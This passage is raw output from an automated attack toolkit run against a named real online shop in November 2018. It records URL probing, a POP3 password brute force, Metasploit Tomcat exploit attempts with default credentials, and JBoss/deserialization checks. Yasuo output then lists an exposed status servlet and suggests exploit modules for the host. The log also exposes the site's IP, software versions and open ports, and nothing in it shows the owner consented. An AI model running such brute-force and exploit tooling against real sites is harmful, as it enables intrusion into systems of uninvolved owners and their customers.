  1678. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1679. |_[ + ] More details:: / - / , ISP:
  1680. |_[ + ] Found:: UNIDENTIFIED
  1681.  
  1682. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1683. |_[ + ] [ 89 / 100 ]-[10:44:43] [ - ]
  1684. |_[ + ] Target:: [ https://www.israelshofar.com/prima-aa-tallis ]
  1685. |_[ + ] Exploit::
  1686. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1687. |_[ + ] More details:: / - / , ISP:
  1688. |_[ + ] Found:: UNIDENTIFIED
  1689.  
  1690. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1691. |_[ + ] [ 90 / 100 ]-[10:44:44] [ - ]
  1692. |_[ + ] Target:: [ https://www.israelshofar.com/rare-ram-horn ]
  1693. |_[ + ] Exploit::
  1694. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1695. |_[ + ] More details:: / - / , ISP:
  1696. |_[ + ] Found:: UNIDENTIFIED
  1697.  
  1698. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1699. |_[ + ] [ 91 / 100 ]-[10:44:45] [ - ]
  1700. |_[ + ] Target:: [ http://www.israelshofar.com/jerusalem-light-tallit- ]
  1701. |_[ + ] Exploit::
  1702. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, , IP:143.95.226.53:80
  1703. |_[ + ] More details:: / - / , ISP:
  1704. |_[ + ] Found:: UNIDENTIFIED
  1705.  
  1706. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1707. |_[ + ] [ 92 / 100 ]-[10:44:47] [ - ]
  1708. |_[ + ] Target:: [ https://www.israelshofar.com/color-wool-talis- ]
  1709. |_[ + ] Exploit::
  1710. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1711. |_[ + ] More details:: / - / , ISP:
  1712. |_[ + ] Found:: UNIDENTIFIED
  1713.  
  1714. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1715. |_[ + ] [ 93 / 100 ]-[10:44:48] [ - ]
  1716. |_[ + ] Target:: [ https://www.israelshofar.com/reffael-flames-tallis- ]
  1717. |_[ + ] Exploit::
  1718. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1719. |_[ + ] More details:: / - / , ISP:
  1720. |_[ + ] Found:: UNIDENTIFIED
  1721.  
  1722. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1723. |_[ + ] [ 94 / 100 ]-[10:44:50] [ - ]
  1724. |_[ + ] Target:: [ https://www.israelshofar.com/shofar?product_id=275 ]
  1725. |_[ + ] Exploit::
  1726. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1727. |_[ + ] More details:: / - / , ISP:
  1728. |_[ + ] Found:: UNIDENTIFIED
  1729.  
  1730. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1731. |_[ + ] [ 95 / 100 ]-[10:44:51] [ - ]
  1732. |_[ + ] Target:: [ http://www.israelshofar.com/shofar?product_id=271 ]
  1733. |_[ + ] Exploit::
  1734. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, , IP:143.95.226.53:80
  1735. |_[ + ] More details:: / - / , ISP:
  1736. |_[ + ] Found:: UNIDENTIFIED
  1737.  
  1738. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1739. |_[ + ] [ 96 / 100 ]-[10:44:52] [ - ]
  1740. |_[ + ] Target:: [ https://www.israelshofar.com/shabbat/wine-fountains ]
  1741. |_[ + ] Exploit::
  1742. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1743. |_[ + ] More details:: / - / , ISP:
  1744. |_[ + ] Found:: UNIDENTIFIED
  1745.  
  1746. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1747. |_[ + ] [ 97 / 100 ]-[10:44:54] [ - ]
  1748. |_[ + ] Target:: [ https://www.israelshofar.com/shabbat/havdalah-sets ]
  1749. |_[ + ] Exploit::
  1750. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1751. |_[ + ] More details:: / - / , ISP:
  1752. |_[ + ] Found:: UNIDENTIFIED
  1753.  
  1754. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1755. |_[ + ] [ 98 / 100 ]-[10:44:55] [ - ]
  1756. |_[ + ] Target:: [ https://www.israelshofar.com/index.php?_route_=emanuel ]
  1757. |_[ + ] Exploit::
  1758. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1759. |_[ + ] More details:: / - / , ISP:
  1760. |_[ + ] Found:: UNIDENTIFIED
  1761.  
  1762. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1763. |_[ + ] [ 99 / 100 ]-[10:44:57] [ - ]
  1764. |_[ + ] Target:: [ https://www.israelshofar.com/Emanuel-Wooden-Mezuzah-David-Tower-Case ]
  1765. |_[ + ] Exploit::
  1766. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1767. |_[ + ] More details:: / - / , ISP:
  1768. |_[ + ] Found:: UNIDENTIFIED
  1769.  
  1770. [ INFO ] [ Shutting down ]
  1771. [ INFO ] [ End of process INURLBR at [14-11-2018 10:44:57]
  1772. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1773. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.israelshofar.com.txt ]
  1774. |_________________________________________________________________________________________
  1775.  
  1776. \_________________________________________________________________________________________/
  1777. #######################################################################################################################################
  1778. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-14 10:44 EST
  1779. Nmap scan report for www.israelshofar.com (143.95.226.53)
  1780. Host is up (0.13s latency).
  1781.  
  1782. PORT STATE SERVICE VERSION
  1783. 110/tcp open pop3 Dovecot pop3d
  1784. | pop3-brute:
  1785. | Accounts: No valid accounts found
  1786. |_ Statistics: Performed 224 guesses in 197 seconds, average tps: 1.1
  1787. |_pop3-capabilities: CAPA PIPELINING UIDL AUTH-RESP-CODE STLS SASL(PLAIN LOGIN) USER TOP RESP-CODES
  1788. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1789. Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Grandstream GXV3275 video phone (94%), Linux 3.2 - 3.8 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 3.3 (93%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), Linux 2.6.32 - 2.6.39 (92%), HP P2000 G3 NAS device (92%), Linux 2.6.32 (90%), Linux 2.6.39 (90%)
  1790. No exact OS matches for host (test conditions non-ideal).
  1791. Network Distance: 1 hop
  1792.  
  1793. TRACEROUTE (using port 80/tcp)
  1794. HOP RTT ADDRESS
  1795. 1 102.64 ms 143.95.226.53
  1796. #######################################################################################################################################
  1797. https://www.israelshofar.com [404 Not Found] Cookies[PHPSESSID,currency,language], Country[UNITED STATES][US], Google-Analytics[Universal][UA-3087574-3], HTML5, HTTPServer[nginx/1.14.1], IP[143.95.226.53], JQuery[1.7.1], PHP[5.4.45], Script[text/javascript], Title[The page you requested cannot be found!], X-Powered-By[PHP/5.4.45], nginx[1.14.1]
  1798. ######################################################################################################################################
  1799.  
  1800. wig - WebApp Information Gatherer
  1801.  
  1802.  
  1803. Scanning https://www.israelshofar.com...
  1804. ____________________ SITE INFO _____________________
  1805. IP Title
  1806. 143.95.226.53 Shofar from Jerusalem – Special Sho
  1807.  
  1808. _____________________ VERSION ______________________
  1809. Name Versions Type
  1810. PHP 5.4.45 Platform
  1811. nginx 1.14.1 Platform
  1812. FreeBSD 10 | 11 OS
  1813. OpenBSD 5.9 OS
  1814.  
  1815. ___________________ INTERESTING ____________________
  1816. URL Note Type
  1817. /robots.txt robots.txt index Interesting
  1818.  
  1819. ____________________________________________________
  1820. Time: 1.8 sec Urls: 616 Fingerprints: 40401
  1821. #######################################################################################################################################
  1822. HTTP/2 200
  1823. server: nginx/1.14.1
  1824. date: Wed, 14 Nov 2018 15:49:21 GMT
  1825. content-type: text/html; charset=utf-8
  1826. x-powered-by: PHP/5.4.45
  1827. expires: Thu, 19 Nov 1981 08:52:00 GMT
  1828. cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  1829. pragma: no-cache
  1830. set-cookie: PHPSESSID=1dead15570a2345b5e544714dc886741; path=/
  1831. set-cookie: language=en; expires=Fri, 14-Dec-2018 15:49:21 GMT; path=/; domain=www.israelshofar.com
  1832. set-cookie: currency=USD; expires=Fri, 14-Dec-2018 15:49:21 GMT; path=/; domain=www.israelshofar.com
  1833. vary: User-Agent,Accept-Encoding
  1834. ######################################################################################################################################
  1835.  
  1836.  
  1837.  
  1838. AVAILABLE PLUGINS
  1839. -----------------
  1840.  
  1841. PluginHSTS
  1842. PluginSessionRenegotiation
  1843. PluginCertInfo
  1844. PluginCompression
  1845. PluginSessionResumption
  1846. PluginOpenSSLCipherSuites
  1847. PluginChromeSha1Deprecation
  1848. PluginHeartbleed
  1849.  
  1850.  
  1851.  
  1852. CHECKING HOST(S) AVAILABILITY
  1853. -----------------------------
  1854.  
  1855. www.israelshofar.com:443 => 143.95.226.53:443
  1856.  
  1857.  
  1858.  
  1859. SCAN RESULTS FOR WWW.ISRAELSHOFAR.COM:443 - 143.95.226.53:443
  1860. -------------------------------------------------------------
  1861.  
  1862. * Deflate Compression:
  1863. OK - Compression disabled
  1864.  
  1865. * Session Renegotiation:
  1866. Client-initiated Renegotiations: OK - Rejected
  1867. Secure Renegotiation: OK - Supported
  1868.  
  1869. * Certificate - Content:
  1870. SHA1 Fingerprint: fb31edf2969561ad504f4358540c8e642d5d0a66
  1871. Common Name: www.israelshofar.com
  1872. Issuer: COMODO RSA Domain Validation Secure Server CA
  1873. Serial Number: 24289B8488FFCB4C2F429F19DE680758
  1874. Not Before: Feb 3 00:00:00 2016 GMT
  1875. Not After: Feb 13 23:59:59 2019 GMT
  1876. Signature Algorithm: sha256WithRSAEncryption
  1877. Public Key Algorithm: rsaEncryption
  1878. Key Size: 2048 bit
  1879. Exponent: 65537 (0x10001)
  1880. X509v3 Subject Alternative Name: {'DNS': ['www.israelshofar.com', 'israelshofar.com']}
  1881.  
  1882. * Certificate - Trust:
  1883. Hostname Validation: OK - Subject Alternative Name matches
  1884. Google CA Store (09/2015): OK - Certificate is trusted
  1885. Java 6 CA Store (Update 65): OK - Certificate is trusted
  1886. Microsoft CA Store (09/2015): OK - Certificate is trusted
  1887. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  1888. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  1889. Certificate Chain Received: ['www.israelshofar.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
  1890.  
  1891. * Certificate - OCSP Stapling:
  1892. NOT SUPPORTED - Server did not send back an OCSP response.
  1893.  
  1894. * SSLV2 Cipher Suites:
  1895. Server rejected all cipher suites.
  1896.  
  1897. * Session Resumption:
  1898. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  1899. With TLS Session Tickets: OK - Supported
  1900.  
  1901. * SSLV3 Cipher Suites:
  1902. Undefined - An unexpected error happened:
  1903. EXP-RC4-MD5 timeout - timed out
  1904. EXP-RC2-CBC-MD5 timeout - timed out
  1905. EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
  1906. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
  1907. EXP-DES-CBC-SHA timeout - timed out
  1908. EXP-ADH-RC4-MD5 timeout - timed out
  1909. EXP-ADH-DES-CBC-SHA timeout - timed out
  1910. EDH-DSS-DES-CBC-SHA timeout - timed out
  1911. ECDHE-RSA-NULL-SHA timeout - timed out
  1912. ECDHE-ECDSA-NULL-SHA timeout - timed out
  1913. DH-RSA-DES-CBC-SHA timeout - timed out
  1914. DH-DSS-DES-CBC-SHA timeout - timed out
  1915. DES-CBC-SHA timeout - timed out
  1916. AECDH-NULL-SHA timeout - timed out
  1917. ADH-DES-CBC-SHA timeout - timed out
  1918.  
  1919.  
  1920.  
  1921. SCAN COMPLETED IN 38.47 S
  1922. -------------------------
  1923. Version: 1.11.12-static
  1924. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1925.  
  1926. Connected to 143.95.226.53
  1927.  
  1928. Testing SSL server www.israelshofar.com on port 443 using SNI name www.israelshofar.com
  1929.  
  1930. TLS Fallback SCSV:
  1931. Server supports TLS Fallback SCSV
  1932.  
  1933. TLS renegotiation:
  1934. Secure session renegotiation supported
  1935.  
  1936. TLS Compression:
  1937. Compression disabled
  1938.  
  1939. Heartbleed:
  1940. TLS 1.2 not vulnerable to heartbleed
  1941. TLS 1.1 not vulnerable to heartbleed
  1942. TLS 1.0 not vulnerable to heartbleed
  1943.  
  1944. Supported Server Cipher(s):
  1945. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  1946. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  1947. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  1948. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  1949. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1950. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1951. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1952. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1953. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1954. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1955.  
  1956. SSL Certificate:
  1957. Signature Algorithm: sha256WithRSAEncryption
  1958. RSA Key Strength: 2048
  1959.  
  1960. Subject: www.israelshofar.com
  1961. Altnames: DNS:www.israelshofar.com, DNS:israelshofar.com
  1962. Issuer: COMODO RSA Domain Validation Secure Server CA
  1963.  
  1964. Not valid before: Feb 3 00:00:00 2016 GMT
  1965. Not valid after: Feb 13 23:59:59 2019 GMT
  1966. ######################################################################################################################################
  1967.  
  1968. ^ ^
  1969. _ __ _ ____ _ __ _ _ ____
  1970. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1971. | V V // o // _/ | V V // 0 // 0 // _/
  1972. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1973. <
  1974. ...'
  1975.  
  1976. WAFW00F - Web Application Firewall Detection Tool
  1977.  
  1978. By Sandro Gauci && Wendel G. Henrique
  1979.  
  1980. Checking http://www.israelshofar.com:8080
  1981. Generic Detection results:
  1982. No WAF detected by the generic detection
  1983. Number of requests: 14
  1984.  
  1985.  
  1986. Version: 1.11.12-static
  1987. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1988.  
  1989. Connected to 143.95.226.53
  1990.  
  1991. Testing SSL server www.israelshofar.com on port 8080 using SNI name www.israelshofar.com
  1992.  
  1993. TLS Fallback SCSV:
  1994. Server does not support TLS Fallback SCSV
  1995.  
  1996. TLS renegotiation:
  1997. Session renegotiation not supported
  1998.  
  1999. TLS Compression:
  2000. Compression disabled
  2001.  
  2002. Heartbleed:
  2003. TLS 1.2 not vulnerable to heartbleed
  2004. TLS 1.1 not vulnerable to heartbleed
  2005. TLS 1.0 not vulnerable to heartbleed
  2006. ######################################################################################################################################
  2007. RHOSTS => www.israelshofar.com
  2008. RHOST => www.israelshofar.com
  2009. [-] WAR file not found
  2010. [*] Auxiliary module execution completed
  2011. [*] Scanned 1 of 1 hosts (100% complete)
  2012. [*] Auxiliary module execution completed
  2013. RPORT => 8080
  2014. [*] Scanned 1 of 1 hosts (100% complete)
  2015. [*] Auxiliary module execution completed
  2016. [*] Attempting to connect to 143.95.226.53:8080
  2017. [+] No File(s) found
  2018. [*] Scanned 1 of 1 hosts (100% complete)
  2019. [*] Auxiliary module execution completed
  2020. [*] http://143.95.226.53:8080/admin/j_security_check - Checking j_security_check...
  2021. [*] http://143.95.226.53:8080/admin/j_security_check - Server returned: 404
  2022. [-] http://143.95.226.53:8080/admin/j_security_check - Unable to enumerate users with this URI
  2023. [*] Scanned 1 of 1 hosts (100% complete)
  2024. [*] Auxiliary module execution completed
  2025. [-] http://143.95.226.53:8080 - Authorization not requested
  2026. [*] Scanned 1 of 1 hosts (100% complete)
  2027. [*] Auxiliary module execution completed
  2028. [-] Exploit aborted due to failure: not-found: The target server fingerprint "nginx/1.14.1" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  2029. [*] Exploit completed, but no session was created.
  2030. USERNAME => tomcat
  2031. PASSWORD => tomcat
  2032. [-] Exploit aborted due to failure: not-found: The target server fingerprint "nginx/1.14.1" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  2033. [*] Exploit completed, but no session was created.
  2034. #######################################################################################################################################
  2035.  
  2036.  
  2037.  
  2038. * --- JexBoss: Jboss verify and EXploitation Tool --- *
  2039. | * And others Java Deserialization Vulnerabilities * |
  2040. | |
  2041. | @author: João Filho Matos Figueiredo |
  2042. | @contact: joaomatosf@gmail.com |
  2043. | |
  2044. | @update: https://github.com/joaomatosf/jexboss |
  2045. #______________________________________________________#
  2046.  
  2047. @version: 1.2.4
  2048.  
  2049. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
  2050.  
  2051.  
  2052. ** Checking Host: http://www.israelshofar.com:8080 **
  2053.  
  2054. [*] Checking admin-console: [ REDIRECT ]
  2055. * The server sent a redirect to: https://www.israelshofar.com/index.php?_route_=admin-console/
  2056.  
  2057. [*] Checking Struts2: [ OK ]
  2058. [*] Checking Servlet Deserialization: [ OK ]
  2059. [*] Checking Application Deserialization: [ OK ]
  2060. [*] Checking Jenkins: [ OK ]
  2061. [*] Checking web-console: [ OK ]
  2062. [*] Checking jmx-console: [ REDIRECT ]
  2063. * The server sent a redirect to: https://www.israelshofar.com/index.php?_route_=403.shtml
  2064.  
  2065. [*] Checking JMXInvokerServlet: [ OK ]
  2066.  
  2067.  
  2068. * Results:
  2069. The server is not vulnerable to bugs tested ... :D
  2070.  
  2071. * Info: review, suggestions, updates, etc:
  2072. https://github.com/joaomatosf/jexboss
  2073.  
  2074. * DONATE: Please consider making a donation to help improve this tool,
  2075. * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
  2076.  
  2077. + -- --=[Port 8180 closed... skipping.
  2078. + -- --=[Port 8443 opened... running tests...
  2079.  
  2080. ^ ^
  2081. _ __ _ ____ _ __ _ _ ____
  2082. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  2083. | V V // o // _/ | V V // 0 // 0 // _/
  2084. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  2085. <
  2086. ...'
  2087.  
  2088. WAFW00F - Web Application Firewall Detection Tool
  2089.  
  2090. By Sandro Gauci && Wendel G. Henrique
  2091.  
  2092. Checking http://www.israelshofar.com:8443
  2093. Generic Detection results:
  2094. No WAF detected by the generic detection
  2095. Number of requests: 14
  2096.  
  2097. http://www.israelshofar.com:8443 [400 Bad Request] Country[UNITED STATES][US], HTTPServer[nginx/1.14.1], IP[143.95.226.53], Title[400 The plain HTTP request was sent to HTTPS port], nginx[1.14.1]
  2098.  
  2099. Version: 1.11.12-static
  2100. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  2101.  
  2102. Connected to 143.95.226.53
  2103.  
  2104. Testing SSL server www.israelshofar.com on port 8443 using SNI name www.israelshofar.com
  2105.  
  2106. TLS Fallback SCSV:
  2107. Server supports TLS Fallback SCSV
  2108.  
  2109. TLS renegotiation:
  2110. Secure session renegotiation supported
  2111.  
  2112. TLS Compression:
  2113. Compression disabled
  2114.  
  2115. Heartbleed:
  2116. TLS 1.2 not vulnerable to heartbleed
  2117. TLS 1.1 not vulnerable to heartbleed
  2118. TLS 1.0 not vulnerable to heartbleed
  2119.  
  2120. Supported Server Cipher(s):
  2121. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  2122. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  2123. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  2124. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  2125. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2126. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2127. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2128. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2129. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2130. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2131.  
  2132. SSL Certificate:
  2133. Signature Algorithm: sha256WithRSAEncryption
  2134. RSA Key Strength: 2048
  2135.  
  2136. Subject: www.israelshofar.com
  2137. Altnames: DNS:www.israelshofar.com, DNS:israelshofar.com
  2138. Issuer: COMODO RSA Domain Validation Secure Server CA
  2139.  
  2140. Not valid before: Feb 3 00:00:00 2016 GMT
  2141. Not valid after: Feb 13 23:59:59 2019 GMT
  2142.  
  2143.  
  2144.  
  2145. AVAILABLE PLUGINS
  2146. -----------------
  2147.  
  2148. PluginHSTS
  2149. PluginSessionRenegotiation
  2150. PluginCertInfo
  2151. PluginCompression
  2152. PluginSessionResumption
  2153. PluginOpenSSLCipherSuites
  2154. PluginChromeSha1Deprecation
  2155. PluginHeartbleed
  2156.  
  2157.  
  2158.  
  2159. CHECKING HOST(S) AVAILABILITY
  2160. -----------------------------
  2161.  
  2162. www.israelshofar.com:8443 => 143.95.226.53:8443
  2163.  
  2164.  
  2165.  
  2166. SCAN RESULTS FOR WWW.ISRAELSHOFAR.COM:8443 - 143.95.226.53:8443
  2167. ---------------------------------------------------------------
  2168.  
  2169. * Deflate Compression:
  2170. OK - Compression disabled
  2171.  
  2172. * Session Renegotiation:
  2173. Client-initiated Renegotiations: OK - Rejected
  2174. Secure Renegotiation: OK - Supported
  2175.  
  2176. * Certificate - Content:
  2177. SHA1 Fingerprint: fb31edf2969561ad504f4358540c8e642d5d0a66
  2178. Common Name: www.israelshofar.com
  2179. Issuer: COMODO RSA Domain Validation Secure Server CA
  2180. Serial Number: 24289B8488FFCB4C2F429F19DE680758
  2181. Not Before: Feb 3 00:00:00 2016 GMT
  2182. Not After: Feb 13 23:59:59 2019 GMT
  2183. Signature Algorithm: sha256WithRSAEncryption
  2184. Public Key Algorithm: rsaEncryption
  2185. Key Size: 2048 bit
  2186. Exponent: 65537 (0x10001)
  2187. X509v3 Subject Alternative Name: {'DNS': ['www.israelshofar.com', 'israelshofar.com']}
  2188.  
  2189. * Certificate - Trust:
  2190. Hostname Validation: OK - Subject Alternative Name matches
  2191. Google CA Store (09/2015): OK - Certificate is trusted
  2192. Java 6 CA Store (Update 65): OK - Certificate is trusted
  2193. Microsoft CA Store (09/2015): OK - Certificate is trusted
  2194. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  2195. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  2196. Certificate Chain Received: ['www.israelshofar.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
  2197.  
  2198. * Certificate - OCSP Stapling:
  2199. NOT SUPPORTED - Server did not send back an OCSP response.
  2200.  
  2201. * Session Resumption:
  2202. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  2203. With TLS Session Tickets: OK - Supported
  2204.  
  2205. * SSLV2 Cipher Suites:
  2206. Server rejected all cipher suites.
  2207.  
  2208. * SSLV3 Cipher Suites:
  2209. Undefined - An unexpected error happened:
  2210. PSK-3DES-EDE-CBC-SHA timeout - timed out
  2211. NULL-SHA256 timeout - timed out
  2212. NULL-SHA timeout - timed out
  2213. NULL-MD5 timeout - timed out
  2214. EXP-RC4-MD5 timeout - timed out
  2215. EXP-RC2-CBC-MD5 timeout - timed out
  2216. EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
  2217. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
  2218. EXP-DES-CBC-SHA timeout - timed out
  2219. EXP-ADH-RC4-MD5 timeout - timed out
  2220. EXP-ADH-DES-CBC-SHA timeout - timed out
  2221. EDH-RSA-DES-CBC-SHA timeout - timed out
  2222. EDH-DSS-DES-CBC3-SHA timeout - timed out
  2223. EDH-DSS-DES-CBC-SHA timeout - timed out
  2224. ECDHE-RSA-NULL-SHA timeout - timed out
  2225. ECDHE-ECDSA-NULL-SHA timeout - timed out
  2226. ECDH-RSA-NULL-SHA timeout - timed out
  2227. ECDH-RSA-DES-CBC3-SHA timeout - timed out
  2228. ECDH-ECDSA-NULL-SHA timeout - timed out
  2229. ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
  2230. DH-RSA-DES-CBC3-SHA timeout - timed out
  2231. DH-RSA-DES-CBC-SHA timeout - timed out
  2232. DH-DSS-DES-CBC3-SHA timeout - timed out
  2233. DH-DSS-DES-CBC-SHA timeout - timed out
  2234. DES-CBC3-SHA timeout - timed out
  2235. DES-CBC-SHA timeout - timed out
  2236. AECDH-NULL-SHA timeout - timed out
  2237. AECDH-DES-CBC3-SHA timeout - timed out
  2238. ADH-DES-CBC3-SHA timeout - timed out
  2239. ADH-DES-CBC-SHA timeout - timed out
  2240.  
  2241.  
  2242.  
  2243. SCAN COMPLETED IN 56.32 S
  2244. -------------------------
  2245. ######################################################################################################################################
  2246.  
  2247.  
  2248.  
  2249. * --- JexBoss: Jboss verify and EXploitation Tool --- *
  2250. | * And others Java Deserialization Vulnerabilities * |
  2251. | |
  2252. | @author: João Filho Matos Figueiredo |
  2253. | @contact: joaomatosf@gmail.com |
  2254. | |
  2255. | @update: https://github.com/joaomatosf/jexboss |
  2256. #______________________________________________________#
  2257.  
  2258. @version: 1.2.4
  2259.  
  2260. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
  2261.  
  2262.  
  2263. ** Checking Host: https://www.israelshofar.com:8443 **
  2264.  
  2265. [*] Checking admin-console: [ OK ]
  2266. [*] Checking Struts2: [ OK ]
  2267. [*] Checking Servlet Deserialization: [ OK ]
  2268. [*] Checking Application Deserialization: [ OK ]
  2269. [*] Checking Jenkins: [ OK ]
  2270. [*] Checking web-console: [ OK ]
  2271. [*] Checking jmx-console: [ OK ]
  2272. [*] Checking JMXInvokerServlet: [ OK ]
  2273.  
  2274.  
  2275. * Results:
  2276. The server is not vulnerable to bugs tested ... :D
  2277.  
  2278. * Info: review, suggestions, updates, etc:
  2279. https://github.com/joaomatosf/jexboss
  2280.  
  2281. * DONATE: Please consider making a donation to help improve this tool,
  2282. * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
  2283.  
  2284. ######################################################################################################################################
  2285.  
  2286. I, [2018-11-14T10:56:40.542545 #11610] INFO -- : Initiating port scan
  2287. I, [2018-11-14T10:57:44.090378 #11610] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-14_10-56-40.xml
  2288. I, [2018-11-14T10:57:44.113846 #11610] INFO -- : Discovered open port: 143.95.226.53:80
  2289. I, [2018-11-14T10:57:45.072787 #11610] INFO -- : Discovered open port: 143.95.226.53:443
  2290. I, [2018-11-14T10:57:46.911872 #11610] INFO -- : Discovered open port: 143.95.226.53:465
  2291. I, [2018-11-14T10:57:48.312715 #11610] INFO -- : Discovered open port: 143.95.226.53:993
  2292. I, [2018-11-14T10:57:50.555324 #11610] INFO -- : Discovered open port: 143.95.226.53:995
  2293. I, [2018-11-14T10:57:52.794439 #11610] INFO -- : Discovered open port: 143.95.226.53:8443
  2294. I, [2018-11-14T10:57:54.773032 #11610] INFO -- : <<<Enumerating vulnerable applications>>>
  2295. [+] Yasuo found an unauthenticated instance of JBoss Status Servlet at http://143.95.226.53:80/status.
  2296.  
  2297.  
  2298. --------------------------------------------------------
  2299. <<<Yasuo discovered following vulnerable applications>>>
  2300. --------------------------------------------------------
  2301. +----------------------+--------------------------------------+------------------------------------------------+----------+----------+
  2302. | App Name | URL to Application | Potential Exploit | Username | Password |
  2303. +----------------------+--------------------------------------+------------------------------------------------+----------+----------+
  2304. | Linksys WRT54GL | https://143.95.226.53:443/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
  2305. | Linksys WRT54GL | https://143.95.226.53:8443/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
